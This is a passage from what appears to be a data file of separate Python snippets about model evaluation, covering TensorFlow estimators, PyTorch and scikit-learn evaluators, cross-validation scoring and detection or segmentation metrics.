tf.estimator.ModeKeys.EVAL:\r\n with tf.variable_scope('losses'):\r\n losses = define_losses(mode, predictions, prolabels, config, params)\r\n\r\n # returns (variable, update_op)\r\n # TF internal error/problem: _streaming_confusion_matrix internally casts\r\n # labels and predictions to int64, and since we feed a dictionary, tensors are\r\n # passed by reference leading them to change type, thus we send an identity\r\n # confusion_matrix = metrics_impl._streaming_confusion_matrix( # pylint: disable=protected-access\r\n # tf.identity(prolabels),\r\n # tf.identity(predictions['decisions']),\r\n # params.output_Nclasses)\r\n # l1_probs, decs = itemgetter('l1_probabilities', 'decisions')(predictions)\r\n # create a new dict with the supported keys only\r\n predictions = _map_predictions_to_new_cids(predictions, 
params.training_cids2evaluation_cids)\r\n if params.replace_voids:\r\n predictions = _replace_voids(predictions, params)\r\n # TODO(panos): confusion matrix expects prolabels and predictions to have the same shape\r\n # this may not the case when preserve_aspect_ratio is set and this will give an error\r\n if hasattr(params, 'preserve_aspect_ratio'):\r\n if params.preserve_aspect_ratio:\r\n raise NotImplementedError('evaluation with preserving aspect ratio is not implemented.')\r\n predictions = _resize_predictions(predictions, tf.shape(labels['prolabels'])[1:3], params)\r\n tcids2ecids = _replacevoids(params.training_cids2evaluation_cids)\r\n confusion_matrix = metrics_impl._streaming_confusion_matrix( # pylint: disable=protected-access\r\n labels['prolabels'],\r\n predictions['decisions'],\r\n # +1 due to convention of starting counting at 0\r\n max(tcids2ecids) + 1)\r\n\r\n # dict of metrics keyed by name with values tuples of (metric_tensor, update_op)\r\n # TODO: add more semantic segmentation metrics\r\n eval_metric_ops = {'confusion_matrix': (\r\n tf.to_int32(confusion_matrix[0]), confusion_matrix[1])}\r\n\r\n scaffold = _define_scaffold(mode, config, params)\r\n estimator_spec = tf.estimator.EstimatorSpec(\r\n mode,\r\n predictions=predictions,\r\n loss=losses['total'],\r\n eval_metric_ops=eval_metric_ops,\r\n scaffold=scaffold)\r\n\r\n if mode == tf.estimator.ModeKeys.PREDICT:\r\n # create a new dict with the supported keys only\r\n l1_probs, l2_vehicle_probs, l2_human_probs, decs = itemgetter(\r\n 'l1_probabilities', 'l2_vehicle_probabilities', 'l2_human_probabilities', 'decisions')(\r\n predictions)\r\n predictions = {'l1_probabilities': l1_probs,\r\n 'l2_vehicle_probabilities': l2_vehicle_probs,\r\n 'l2_human_probabilities': l2_human_probs,\r\n 'decisions': decs}\r\n # workaround for connecting input pipeline outputs to system output\r\n # TODO(panos): maybe from a system perspective makes more sense to have mapping and\r\n # resizing in the system_factory\r\n # since these are functions of the system and not the network/estimator\r\n # new size defaults to provided values\r\n # if at least one is None then new size is the arbitrary size of rawimage in each step\r\n new_size = (params.height_system, params.width_system)\r\n is_arbitrary = not all(new_size)\r\n if is_arbitrary:\r\n if rawimages is not None:\r\n predictions['rawimages'] = rawimages\r\n if rawimagespaths is not None:\r\n predictions['rawimagespaths'] = rawimagespaths\r\n new_size = tf.shape(predictions['rawimages'])[1:3]\r\n predictions = _resize_predictions(predictions, new_size, params)\r\n tf.logging.warn('Mapping of predictions to new cids is not implemented for now.')\r\n # predictions = _map_predictions_to_new_cids(predictions, params.training_cids2inference_cids)\r\n if params.replace_voids:\r\n predictions = _replace_voids(predictions, params)\r\n\r\n scaffold = _define_scaffold(mode, config, params)\r\n estimator_spec = tf.estimator.EstimatorSpec(\r\n mode,\r\n predictions=predictions,\r\n scaffold=scaffold)\r\n\r\n return estimator_spec", "def __init__(\n self,\n estimator = SGDClassifier(),\n ):\n self.estimator = estimator", "def create_setops_evaluator(\r\n base_model,\r\n classifier,\r\n setops_model,\r\n metrics={},\r\n device=None):\r\n if device:\r\n base_model.to(device)\r\n classifier.to(device)\r\n setops_model.to(device)\r\n\r\n def _inference(engine, batch):\r\n\r\n base_model.eval()\r\n classifier.eval()\r\n setops_model.eval()\r\n\r\n with torch.no_grad():\r\n input_a, input_b, target_a, 
target_b = _prepare_batch(batch, device=device)\r\n\r\n #\r\n # Apply the classification model\r\n #\r\n embed_a = base_model(input_a)\r\n output_a = classifier(embed_a)\r\n embed_b = base_model(input_b)\r\n output_b = classifier(embed_b)\r\n\r\n #\r\n # Apply the setops model.\r\n #\r\n outputs_setopt = setops_model(embed_a, embed_b)\r\n fake_a, fake_b, a_S_b, b_S_a, a_U_b, b_U_a, a_I_b, b_I_a, \\\r\n a_S_b_b, b_S_a_a, a_I_b_b, b_I_a_a, a_U_b_b, b_U_a_a, \\\r\n a_S_b_I_a, b_S_a_I_b, a_S_a_I_b, b_S_b_I_a = \\\r\n [classifier(o) for o in outputs_setopt]\r\n fake_a_em, fake_b_em = outputs_setopt[:2]\r\n\r\n #\r\n # Calculate the target setops operations\r\n #\r\n target_a_bt = target_a.type(torch.cuda.ByteTensor)\r\n target_b_bt = target_b.type(torch.cuda.ByteTensor)\r\n\r\n target_a_I_b = target_a_bt & target_b_bt\r\n target_a_U_b = target_a_bt | target_b_bt\r\n target_a_S_b = target_a_bt & ~target_a_I_b\r\n target_b_S_a = target_b_bt & ~target_a_I_b\r\n\r\n target_a_I_b = target_a_I_b.type(torch.cuda.FloatTensor)\r\n target_a_U_b = target_a_U_b.type(torch.cuda.FloatTensor)\r\n target_a_S_b = target_a_S_b.type(torch.cuda.FloatTensor)\r\n target_b_S_a = target_b_S_a.type(torch.cuda.FloatTensor)\r\n\r\n return dict(\r\n outputs={\r\n \"real class a\": output_a,\r\n \"real class b\": output_b,\r\n \"fake class a\": fake_a,\r\n \"fake class b\": fake_b,\r\n \"a_S_b class\": a_S_b,\r\n \"b_S_a class\": b_S_a,\r\n \"a_U_b class\": a_U_b,\r\n \"b_U_a class\": b_U_a,\r\n \"a_I_b class\": a_I_b,\r\n \"b_I_a class\": b_I_a,\r\n \"fake embed a\": fake_a_em,\r\n \"fake embed b\": fake_b_em,\r\n },\r\n targets={\r\n \"class a\": target_a,\r\n \"class b\": target_b,\r\n \"a_S_b class\": target_a_S_b,\r\n \"b_S_a class\": target_b_S_a,\r\n \"a_U_b class\": target_a_U_b,\r\n \"a_I_b class\": target_a_I_b,\r\n \"embed a\": embed_a,\r\n \"embed b\": embed_b,\r\n }\r\n )\r\n\r\n engine = Engine(_inference)\r\n\r\n for name, metric in metrics.items():\r\n metric.attach(engine, name)\r\n\r\n return engine", "def evaluator(*args, clusters: bool=True, configuration: Union[AnyStr, List[AnyStr], bool]=\"\",\n enable: bool=True, info: bool=True, name: Union[AnyStr, bool]=\"\", nodeType:\n Union[AnyStr, List[AnyStr], bool]=\"\", nodeTypeChildren: bool=True, priority:\n Union[int, bool]=0, valueName: Union[AnyStr, bool]=\"\", q=True, query=True,\n **kwargs)->Union[List[AnyStr], Any]:\n pass", "def eval(self):\n raise NotImplementedError('Must define eval function to use this base class')", "def runner_decrator(cls):\n\n def custom_build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):\n \"\"\"\n Create evaluator(s) for a given dataset.\n This uses the special metadata \"evaluator_type\" associated with each builtin dataset.\n For your own dataset, you can simply create an evaluator manually in your\n script and do not have to worry about the hacky if-else logic here.\n \"\"\"\n dump_train = cfg.GLOBAL.DUMP_TRAIN\n return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)\n\n def custom_test_with_TTA(cls, cfg, model):\n # In the end of training, run an evaluation with TTA\n # Only support some R-CNN models.\n logger.info(\"Running inference with test-time augmentation ...\")\n model = GeneralizedRCNNWithTTA(cfg, model)\n res = cls.test(cfg, model, output_folder=os.path.join(cfg.OUTPUT_DIR, \"inference_TTA\"))\n res = OrderedDict({k + \"_TTA\": v for k, v in res.items()})\n return res\n\n cls.build_evaluator = classmethod(custom_build_evaluator)\n cls.test_with_TTA = 
classmethod(custom_test_with_TTA)\n\n return cls", "def evaluator(model, config, test_dir=None):\n shottype = config.shottype\n dataset = config.data_set\n seed = config.seed\n if test_dir is None:\n test_data_gen_dir, _, _ = _generator_dir(\n config=config, target_gen=\"test\", data_dir=None\n )\n if test_dir is not None:\n print(\"Evaluating directory: '{}'.\".format(test_dir))\n test_data_gen_dir, _, _ = _generator_dir(\n config=config, target_gen=\"test\", data_dir=test_dir\n )\n score = model.evaluate_generator(test_data_gen_dir)\n print(\n \"Test metrics: \"\n \"Loss: {:.4f}, \"\n \"Accuracy: {:.4f}, \"\n \"Top 3 accuracy: {:.4f}\".format(score[0], score[1], score[2])\n )\n return score", "def __init__(self):\n self.svclassifier = SVC(kernel='linear')", "def build_evaluation(self, predictions, examples, **kwargs):\n return {}", "def build_and_evaluate(\n X, y, classifier=SGDClassifier,\n verbose=True, ngram_range=(1,1), test_size=0.2, max_features=None\n ):\n\n def build(classifier, X, y=None, ngram_range=(1,1), max_features=None):\n \"\"\"\n Inner build function that builds a single model.\n \"\"\"\n if isinstance(classifier, type):\n classifier = classifier()\n\n model = Pipeline([\n ('vectorizer', TfidfVectorizer(\n ngram_range=ngram_range,\n stop_words='english',\n max_features=max_features\n )),\n ('classifier', classifier),\n ])\n\n model.fit(X, y)\n return model\n\n # Label encode the targets\n labels = LabelEncoder()\n y = labels.fit_transform(y)\n\n # Begin evaluation\n if verbose: print(\"Building for evaluation\")\n X_train, X_test, y_train, y_test = tts(X, y, test_size=test_size)\n \n model = build(classifier, \n X_train, \n y_train, \n ngram_range=ngram_range, \n max_features=max_features\n )\n\n model.labels_ = labels\n\n if verbose: print(\"Classification Report:\\n\")\n\n y_pred = model.predict(X_test)\n print(clsr(y_test, y_pred, target_names=labels.classes_))\n print(confusion_matrix(y_test, y_pred))\n\n return model", "def _run_evaluator(self, func, stats):\n host_stats = stats['host_stats']\n host_caps = stats['host_caps']\n extra_specs = stats['extra_specs']\n share_stats = stats['share_stats']\n\n result = evaluator.evaluate(\n func,\n extra=extra_specs,\n stats=host_stats,\n capabilities=host_caps,\n share=share_stats)\n\n return result", "def getInputSpecification(cls):\n specs = super().getInputSpecification()\n specs.description = r\"\"\"The \\xmlNode{OneVsRestClassifier} (\\textit{One-vs-the-rest (OvR) multiclass strategy})\n Also known as one-vs-all, this strategy consists in fitting one classifier per class. For each\n classifier, the class is fitted against all the other classes. In addition to its computational\n efficiency (only n\\_classes classifiers are needed), one advantage of this approach is its\n interpretability. 
Since each class is represented by one and one classifier only, it is\n possible to gain knowledge about the class by inspecting its corresponding classifier.\n This is the most commonly used strategy for multiclass classification and is a fair default choice.\n \\zNormalizationNotPerformed{OneVsRestClassifier}\n \"\"\"\n estimatorInput = InputData.assemblyInputFactory(\"estimator\", contentType=InputTypes.StringType,\n descr=r\"\"\"name of a ROM that can be used as an estimator\"\"\", default='no-default')\n #TODO: Add more inputspecs for estimator\n specs.addSub(estimatorInput)\n\n specs.addSub(InputData.parameterInputFactory(\"n_jobs\", contentType=InputTypes.IntegerType,\n descr=r\"\"\"TThe number of jobs to use for the computation: the n\\_classes one-vs-rest\n problems are computed in parallel. None means 1 unless in a joblib.parallel\\_backend\n context. -1 means using all processors.\"\"\", default=None))\n return specs", "def eval(self):\n raise NotImplementedError", "def _prepare_evaluate(self):\n labels = list()\n labels += ['num_procs', 'num_periods', 'is_debug', 'seed_emax', 'seed_sim']\n labels += ['num_draws_emax', 'num_agents_sim', 'num_types', 'edu_spec', 'version']\n labels += ['num_draws_prob', 'seed_prob']\n num_procs, num_periods, is_debug, seed_emax, seed_sim, num_draws_emax, num_agents_sim, \\\n num_types, edu_spec, version, num_draws_prob, seed_prob = \\\n dist_class_attributes(self.respy_base, *labels)\n\n periods_draws_emax = create_draws(num_periods, num_draws_emax, seed_emax, is_debug)\n periods_draws_sims = create_draws(num_periods, num_agents_sim, seed_sim, is_debug)\n\n disturbances = (periods_draws_emax, periods_draws_sims)\n\n # We want to maintain a pure PYTHON version for testing purposes.\n args = list()\n args += [num_periods, num_types, edu_spec['start'], edu_spec['max'], edu_spec['max'] + 1]\n state_space_info = respy_f2py.wrapper_create_state_space(*args)\n if self.mpi_setup == MISSING_INT:\n slavecomm = self.mpi_setup\n else:\n slavecomm = self.mpi_setup.py2f()\n self.set_up_baseline(periods_draws_emax, None)\n\n initial_conditions = get_initial_conditions(self.respy_base)\n\n args = (smm_sample_f2py, state_space_info, initial_conditions, disturbances, slavecomm)\n self.simulate_sample = partial(*args)", "def make_predict_step(self):\n return self.make_eval_step()", "def evaluate_segmentation(self) -> Dict[str, Any]:\n for sample_token in tqdm(self.sample_tokens, disable=not self.verbose):\n sample = self.nusc.get('sample', sample_token)\n # Get the sample data token of the point cloud.\n sd_token = sample['data']['LIDAR_TOP']\n\n # Load the ground truth labels for the point cloud.\n panoptic_label_filename = os.path.join(self.nusc.dataroot, self.nusc.get('panoptic', sd_token)['filename'])\n panoptic_label = load_bin_file(panoptic_label_filename, type='panoptic')\n\n # Filter eval classes.\n label_sem = self.mapper.convert_label(panoptic_label // 1000)\n label_inst = panoptic_label\n panoptic_pred_filename = os.path.join(self.results_folder, 'panoptic', self.eval_set,\n sd_token + '_panoptic.npz')\n panoptic_pred = load_bin_file(panoptic_pred_filename, type='panoptic')\n pred_sem = panoptic_pred // 1000\n pred_inst = panoptic_pred\n\n # Get the confusion matrix between the ground truth and predictions. 
Update the confusion matrix for the\n # sample data into the confusion matrix for the eval set.\n self.evaluator['segmentation'].addBatch(pred_sem, pred_inst, label_sem, label_inst)\n\n mean_pq, mean_sq, mean_rq, class_all_pq, class_all_sq, class_all_rq = self.evaluator['segmentation'].getPQ()\n mean_iou, class_all_iou = self.evaluator['segmentation'].getSemIoU()\n\n results = self.wrap_result_segmentation(mean_pq, mean_sq, mean_rq, mean_iou, class_all_pq, class_all_sq,\n class_all_rq, class_all_iou)\n return results", "def evaluate_model(testing_images, *model, num_images=None, shuffle=False):\n if num_images is None:\n if hasattr(testing_images, \"__len__\"):\n num_images = len(testing_images)\n else:\n raise ValueError(\"Require num_images with infinite dataset\")\n \n if shuffle:\n testing_images = random_iterator(testing_images)\n imgs = islice(testing_images, num_images)\n\n E = Evaluator()\n logging.info(f\"Running model on {num_images} images\")\n for idx,(gt,dt,shape) in enumerate(detect_on_images(imgs, *model), start=1):\n E.add_ground_truth(idx, gt, shape)\n E.add_detections(idx, dt)\n if idx % 20 == 0:\n logging.info(f\"{idx}\")\n\n if num_images != idx:\n logging.warning(f\"Requested test on {num_images} but only {idx} images were given in dataset.\")\n\n return E", "def make_local_evaluator(self,\n env_creator,\n policy_graph,\n extra_config=None):\n\n return self._make_evaluator(\n CustomEnvPolicyEvaluator,\n env_creator,\n policy_graph,\n 0,\n merge_dicts(\n # important: allow local tf to use more CPUs for optimization\n merge_dicts(\n self.config, {\n \"tf_session_args\": self.\n config[\"local_evaluator_tf_session_args\"]\n }),\n extra_config or {}))", "def predict_and_eval_in_val(self, sess, tst_reader, metrics):\n raise NotImplementedError(\"\"\"please customize predict_and_eval_in_val\"\"\")", "def train_and_eval(self):\n self.__create_indexes()\n model = None\n model = None\n if self.model == 'OMult':\n model = OMult(self.kwargs)\n elif self.model == 'ConvO':\n model = ConvO(self.kwargs)\n elif self.model == 'QMult':\n model = QMult(self.kwargs)\n elif self.model == 'ConvQ':\n model = ConvQ(self.kwargs)\n elif self.model == 'OMultBatch':\n model = OMultBatch(self.kwargs)\n elif self.model == 'ConvOBatch':\n model = ConvOBatch(self.kwargs)\n elif self.model == 'QMultBatch':\n model = QMultBatch(self.kwargs)\n elif self.model == 'ConvQBatch':\n model = ConvQBatch(self.kwargs)\n else:\n print(self.model, ' is not valid name')\n raise ValueError\n\n self.train(model)\n self.eval(model)", "def _generate_evaluaters(self):\n evaluators = []\n for para_key in self.parameter[1]:\n for value in self.parameter[1][para_key]:\n evaluators.append(evaluaterSearch.evaluaterSearch(self.parameter[2], [para_key, value]))\n self.evaluators = evaluators", "def __init__(self, model, masker, partition_tree):\n\n warnings.warn(\"PartitionExplainer is still in an alpha state, so use with caution...\")\n \n # convert dataframes\n if safe_isinstance(masker, \"pandas.core.series.Series\"):\n masker = masker.values\n elif safe_isinstance(masker, \"pandas.core.frame.DataFrame\"):\n masker = masker.values\n\n # If the user just gave a dataset as the masker\n # then we make a masker that perturbs features independently\n self.input_shape = masker.shape[1:] if hasattr(masker, \"shape\") else None\n if type(masker) == np.ndarray:\n self.masker_data = masker\n self.masker = lambda x, mask: x * mask + self.masker_data * np.invert(mask)\n else:\n self.masker = masker\n\n self.model = lambda x: 
np.array(model(x))\n self.expected_value = None\n self.partition_tree = partition_tree\n \n # handle higher dimensional tensor inputs\n if self.input_shape is not None and len(self.input_shape) > 1:\n self._reshaped_model = lambda x: self.model(x.reshape(x.shape[0], *self.input_shape))\n else:\n self._reshaped_model = self.model\n\n # if we don't have a dynamic clustering algorithm then we can precompute\n # a lot of information\n if not callable(self.partition_tree):\n self.create_cluster_matrices(self.partition_tree)", "def _evaluate(model):\n _recompile(model)\n if isinstance(eval_dataset, tuple):\n eval_images, eval_labels = eval_dataset\n return model.evaluate(\n eval_images, eval_labels, verbose=verbose, return_dict=True)\n else:\n return model.evaluate(eval_dataset, verbose=verbose, return_dict=True)", "def _build(self,\n model_type: str,\n **kwargs) -> Predictor:\n if model_type == 'classifier':\n modelcls = sklearn.gaussian_process.GaussianProcessClassifier\n elif model_type == 'regressor':\n modelcls = sklearn.gaussian_process.GaussianProcessRegressor\n else:\n raise ValueError(\n '`model_type` should be \"classifier\" or \"regressor\"')\n model = modelcls(**kwargs)\n return model", "def evaluate(QualityMeasure,ModelClass,dataset,subgroup,target1,target2): \r\n evaluator = {\r\n QualityMeasure.SCD: evaluate_scd,\r\n }\r\n return evaluator.get(QualityMeasure)(ModelClass,dataset,subgroup,target1,target2)", "def evaluate(self, X, y, hypes={}, n_splits=5, shuffle=True, standardize=True, groups=None):\n \n ### SET HYPERPARAMETERS ###\n model = clone(self.estimator) # Gotta do this otherwise funky things happen\n model.set_params(**hypes)\n \n ### INITIALIZE SCORING DATAFRAME ###\n fractions = ['train', 'val']\n scoring_metrics = ['mae', 'mape', 'medape', 'pearson', 'spearman']\n score_columns = pd.MultiIndex.from_product([fractions, scoring_metrics]) # This sets up a heirarchical index for the results dataframe\n score = pd.DataFrame(columns=score_columns)\n\n ### SET UP X-VALIDATION ###\n \n if groups is not None:\n cv = model_selection.LeaveOneGroupOut()\n splitter = enumerate(cv.split(X,y,groups))\n else:\n cv = model_selection.KFold(n_splits=n_splits, shuffle=shuffle)\n splitter = enumerate(cv.split(X,y))\n\n ### RUN CV AND SCORE MODEL ###\n last_splits = [] # Keep track of split indices for forensics\n for idx, (train, val) in splitter:\n\n X_train = X.iloc[train,:]; y_train = y.iloc[train]\n X_val = X.iloc[val,:]; y_val = y.iloc[val]\n \n if standardize:\n std = preprocessing.StandardScaler()\n std.fit(X_train)\n X_train, X_val = std.transform(X_train), std.transform(X_val)\n\n # if idx==0:\n # for v in ['X_train','y_train','X_val','y_val']:\n # print('{} shape: {}'.format(v, eval('{}.shape'.format(v))))\n\n ### INSTANTIATE AND FIT MODEL ###\n last_splits.append((train, val))\n model.fit(X_train, y_train)\n\n for frac in ['train','val']:\n \n # y_true will either be y_train or y_val depending on what 'frac' is. 
Kind of hacky.\n y_true = eval('y_'+frac)\n y_pred = model.predict(eval('X_'+frac))\n \n # Calculate MAE\n score.loc[idx, (frac,'mae')] = \\\n metrics.mean_absolute_error(y_true, y_pred)\n \n # Calculate MAPE\n score.loc[idx, (frac,'mape')] = \\\n mean_absolute_percentage_error(y_true, y_pred)\n \n # Calculate MedAPE\n score.loc[idx, (frac,'medape')] = \\\n median_absolute_percentage_error(y_true, y_pred)\n\n # Calculate pearson\n score.loc[idx, (frac,'pearson')] = \\\n stats.pearsonr(y_true, y_pred)[0]\n\n # Calculate spearman\n score.loc[idx, (frac,'spearman')] = \\\n stats.spearmanr(y_true, y_pred)[0]\n\n self.estimator = model\n self.last_scores = score\n self.last_hypes = hypes\n self.last_splits = last_splits\n\n return score", "def _make_train_input_fn(is_classification):\n\n def _input_fn():\n features = dict(FEATURES_DICT)\n if is_classification:\n labels = CLASSIFICATION_LABELS\n else:\n labels = REGRESSION_LABELS\n return features, labels\n\n return _input_fn", "def __init__(self, model_name_or_path, max_length=1024, device='cuda:0', cache_dir=None):\n self.scorer = UniEvaluator(\n model_name_or_path='MingZhong/unieval-fact' if model_name_or_path == \"\" else model_name_or_path,\n max_length=max_length,\n device=device,\n cache_dir=cache_dir)\n self.task = 'fact'\n self.dim = 'consistency'", "def __init__(self, model_name_or_path, max_length=1024, device='cuda:0', cache_dir=None):\n self.scorer = UniEvaluator(\n model_name_or_path='MingZhong/unieval-sum' if model_name_or_path == \"\" else model_name_or_path,\n max_length=max_length,\n device=device,\n cache_dir=cache_dir)\n self.task = 'summarization'\n self.dimensions = ['coherence', 'consistency', 'fluency', 'relevance']", "def as_estimator_spec(self):\n host_calls = {}\n if self.eval_metrics is not None:\n host_calls['eval_metrics'] = self.eval_metrics\n if self.host_call is not None:\n host_calls['host_call'] = self.host_call\n host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)\n eval_metric_ops = None\n if self.eval_metrics is not None:\n eval_metric_ops = host_call_ret['eval_metrics']\n hooks = None\n if self.host_call is not None:\n hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]\n scaffold = self.scaffold_fn() if self.scaffold_fn else None\n return model_fn_lib.EstimatorSpec(\n mode=self.mode,\n predictions=self.predictions,\n loss=self.loss,\n train_op=self.train_op,\n eval_metric_ops=eval_metric_ops,\n export_outputs=self.export_outputs,\n scaffold=scaffold,\n training_hooks=hooks,\n evaluation_hooks=hooks,\n prediction_hooks=hooks)", "def eval(self, *args, **kwargs):\n raise NotImplementedError", "def get_default_evaluator(self) -> EvaluatorConfig:\n raise NotImplementedError()", "def _set_eval(self):\n\n if self.model.__dict__['training']:\n self.model.eval()", "def evaluation(store, evaluation_obj):\n evaluation_obj['institute'] = store.institute(evaluation_obj['institute_id'])\n evaluation_obj['case'] = store.case(evaluation_obj['case_id'])\n evaluation_obj['variant'] = store.variant(evaluation_obj['variant_specific'])\n evaluation_obj['criteria'] = {criterion['term']: criterion for criterion in\n evaluation_obj['criteria']}\n evaluation_obj['classification'] = ACMG_COMPLETE_MAP[evaluation_obj['classification']]\n return evaluation_obj", "def eval(self):\n self.train(mode=False)", "def set_models_eval(self):\n raise NotImplementedError", "def evaluate(cfg: DictConfig):\n\n # suppress TensorFlow and DALI warnings\n suppress_warnings()\n\n if cfg.USE_MULTI_GPUS.VALUE:\n # change number of 
visible gpus for evaluation\n set_gpus(cfg.USE_MULTI_GPUS.GPU_IDS)\n # update batch size according to available gpus\n data_generator.update_batch_size(cfg)\n\n if cfg.OPTIMIZATION.AMP:\n print(\"Enabling Automatic Mixed Precision(AMP) training\")\n policy = mixed_precision.Policy('mixed_float16')\n mixed_precision.set_global_policy(policy)\n\n if cfg.OPTIMIZATION.XLA:\n print(\"Enabling Automatic Mixed Precision(XLA) training\")\n tf.config.optimizer.set_jit(True)\n\n # create model\n strategy = None\n if cfg.USE_MULTI_GPUS.VALUE:\n # multi gpu training using tensorflow mirrored strategy\n strategy = tf.distribute.MirroredStrategy(\n cross_device_ops=tf.distribute.HierarchicalCopyAllReduce()\n )\n print('Number of visible gpu devices: {}'.format(strategy.num_replicas_in_sync))\n with strategy.scope():\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=cfg.HYPER_PARAMETERS.LEARNING_RATE\n ) # optimizer\n if cfg.OPTIMIZATION.AMP:\n optimizer = mixed_precision.LossScaleOptimizer(\n optimizer,\n dynamic=True\n )\n dice_coef = DiceCoefficient(post_processed=True, classes=cfg.OUTPUT.CLASSES)\n dice_coef = tf.keras.metrics.MeanMetricWrapper(name=\"dice_coef\", fn=dice_coef)\n model = prepare_model(cfg, training=True)\n else:\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=cfg.HYPER_PARAMETERS.LEARNING_RATE\n ) # optimizer\n if cfg.OPTIMIZATION.AMP:\n optimizer = mixed_precision.LossScaleOptimizer(\n optimizer,\n dynamic=True\n )\n dice_coef = DiceCoefficient(post_processed=True, classes=cfg.OUTPUT.CLASSES)\n dice_coef = tf.keras.metrics.MeanMetricWrapper(name=\"dice_coef\", fn=dice_coef)\n model = prepare_model(cfg, training=True)\n\n model.compile(\n optimizer=optimizer,\n loss=unet3p_hybrid_loss,\n metrics=[dice_coef],\n )\n\n # weights model path\n checkpoint_path = join_paths(\n cfg.WORK_DIR,\n cfg.CALLBACKS.MODEL_CHECKPOINT.PATH,\n f\"{cfg.MODEL.WEIGHTS_FILE_NAME}.hdf5\"\n )\n\n assert os.path.exists(checkpoint_path), \\\n f\"Model weight's file does not exist at \\n{checkpoint_path}\"\n\n # TODO: verify without augment it produces same results\n # load model weights\n model.load_weights(checkpoint_path, by_name=True, skip_mismatch=True)\n model.summary()\n\n # data generators\n val_generator = data_generator.get_data_generator(cfg, \"VAL\", strategy)\n validation_steps = data_generator.get_iterations(cfg, mode=\"VAL\")\n\n # evaluation metric\n evaluation_metric = \"dice_coef\"\n if len(model.outputs) > 1:\n evaluation_metric = f\"{model.output_names[0]}_dice_coef\"\n\n result = model.evaluate(\n x=val_generator,\n steps=validation_steps,\n workers=cfg.DATALOADER_WORKERS,\n return_dict=True,\n )\n\n # return computed loss, validation accuracy, and it's metric name\n return result, evaluation_metric", "def model_build(self, estimators):\n return RandomForestClassifier(n_estimators=estimators, n_jobs=-1)", "def _evaluate_during_fit(self, test_loader, epoch):", "def evaluate(create_input_dict_fn, create_model_fn, eval_config, categories,\n checkpoint_dir, eval_dir):\n\n model = create_model_fn()\n\n if eval_config.ignore_groundtruth and not eval_config.export_path:\n logging.fatal('If ignore_groundtruth=True then an export_path is '\n 'required. 
Aborting!!!')\n\n tensor_dict = _extract_prediction_tensors(\n model=model,\n create_input_dict_fn=create_input_dict_fn,\n ignore_groundtruth=eval_config.ignore_groundtruth)\n \n \n def _process_batch(tensor_dict, sess, batch_index, counters):\n \"\"\"Evaluates tensors in tensor_dict, visualizing the first K examples.\n\n This function calls sess.run on tensor_dict, evaluating the original_image\n tensor only on the first K examples and visualizing detections overlaid\n on this original_image.\n\n Args:\n tensor_dict: a dictionary of tensors\n sess: tensorflow session\n batch_index: the index of the batch amongst all batches in the run.\n counters: a dictionary holding 'success' and 'skipped' fields which can\n be updated to keep track of number of successful and failed runs,\n respectively. If these fields are not updated, then the success/skipped\n counter values shown at the end of evaluation will be incorrect.\n\n Returns:\n result_dict: a dictionary of numpy arrays\n \"\"\"\n try:\n result_dict = sess.run(tensor_dict)\n counters['success'] += 1\n except tf.errors.InvalidArgumentError:\n logging.info('Skipping image')\n counters['skipped'] += 1\n return {}\n global_step = tf.train.global_step(sess, tf.train.get_global_step())\n eval_util.save_values_matrix(sess, result_dict)\n if batch_index < eval_config.num_visualizations:\n tag = 'image-{}'.format(batch_index)\n eval_util.visualize_detection_results(\n\t sess,\n result_dict,\n tag,\n global_step,\n categories=categories,\n summary_dir=eval_dir,\n export_dir=eval_config.visualization_export_dir,\n show_groundtruth=eval_config.visualization_export_dir)\n# print (result_dict)\n return result_dict\n\n variables_to_restore = tf.global_variables()\n global_step = tf.train.get_or_create_global_step()\n variables_to_restore.append(global_step)\n if eval_config.use_moving_averages:\n variable_averages = tf.train.ExponentialMovingAverage(0.0)\n variables_to_restore = variable_averages.variables_to_restore()\n saver = tf.train.Saver(variables_to_restore)\n\n def _restore_latest_checkpoint(sess):\n latest_checkpoint = tf.train.latest_checkpoint(checkpoint_dir)\n saver.restore(sess, latest_checkpoint)\n\n\n #############################################################\n def _save_values_matrix(sess, _process_batch, max_num_prediction):\n if not set([\n 'original_image', 'detection_boxes', 'detection_scores',\n 'detection_classes'\n ]).issubset(set(result_dict.keys())):\n raise ValueError('result_dict does not contain all expected keys.')\n if show_groundtruth and 'groundtruth_boxes' not in result_dict:\n raise ValueError('If show_groundtruth is enabled, result_dict must contain '\n 'groundtruth_boxes.')\n logging.info('Creating detection visualizations.')\n category_index = label_map_util.create_category_index(categories)\n\n image = np.squeeze(result_dict['original_image'], axis=0)\n detection_boxes = result_dict['detection_boxes']\n detection_scores = result_dict['detection_scores']\n detection_classes = np.int32((result_dict['detection_classes']))\n groundtruth_classes = np.int32((result_dict['groundtruth_classes']))\n detection_keypoints = result_dict.get('detection_keypoints', None)\n detection_masks = result_dict.get('detection_masks', None)\n groundtruth_boxes_b = result_dict['groundtruth_boxes']\n detection_boxes_2= box_list.BoxList(tf.convert_to_tensor(detection_boxes))\n groundtruth_boxes_2= box_list.BoxList(tf.convert_to_tensor(groundtruth_boxes_b))\n matchGT_matrix = list()\n FP_matrix= list()\n prueba=np.matrix([[0,1],[2,3]])\n if 
not isinstance(groundtruth_boxes_2, box_list.BoxList):\n raise ValueError('anchors must be an BoxList')\n t = region_similarity_calculator.IouSimilarity()\n compare_tensor = t.compare(detection_boxes_2,groundtruth_boxes_2)\n compare_array = sess.run(compare_tensor)\n len_compare = compare_array.shape\n for i in range(len_compare[1]):\n max_score= 0\n flag= 1\n for j in range(len_compare[0]):\n if len_compare[1]==1:\n IrU = compare_array[j]\n else:\n IrU = compare_array[j][i]\n if IrU>0.6 and detection_scores[j]>max_score:\n max_score= detection_scores[j]\n if flag==1:\n matchGT_matrix.append([detection_classes[j], groundtruth_classes[i], detection_scores[j]])\n flag= 0\n else:\n matchGT_matrix[i]=[detection_classes[j], groundtruth_classes[i], detection_scores[j]]\n if j==99 and max_score<0.6:\n matchGT_matrix[i]=[0, groundtruth_classes[i], max_score]\n if IrU<0.2 and i==1 and np.max(detection_scores[j])>0.5:\n FP_matrix.append([detection_classes[j], 0, detection_scores[j]])\n\n with open('/home/jesus.molina/matchGT_matrix.csv', 'r') as csv_file:\n newFileReader = csv.reader(csv_file)\n for row in newFileReader:\n matchGT_matrix.append(row)\n #print matchGT_matrix[1][0]\n\n with 